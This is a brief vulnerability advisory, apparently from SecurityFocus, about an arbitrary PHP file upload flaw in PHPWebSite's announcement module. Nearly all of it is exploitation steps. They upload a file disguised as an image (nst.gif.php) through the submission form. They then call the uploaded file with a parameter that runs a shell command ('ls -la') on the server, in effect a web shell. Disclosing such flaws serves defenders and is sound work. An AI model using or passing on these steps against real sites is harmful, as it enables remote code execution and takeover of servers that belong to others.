PHPWebSite Image File Processing Remote Arbitrary PHP File Upload Vulnerability

The following example is available:

http://www.example.com/index.php?module=announce&ANN_user_op=submit_announcement&MMN_position=3:3

1. Fill all inputs
2. in Image: select nst.gif.php

press Save.

Go here http://www.example.com/images/announce/nst.gif.php?nst=ls -la


 

Privacy Statement
Copyright 2010, SecurityFocus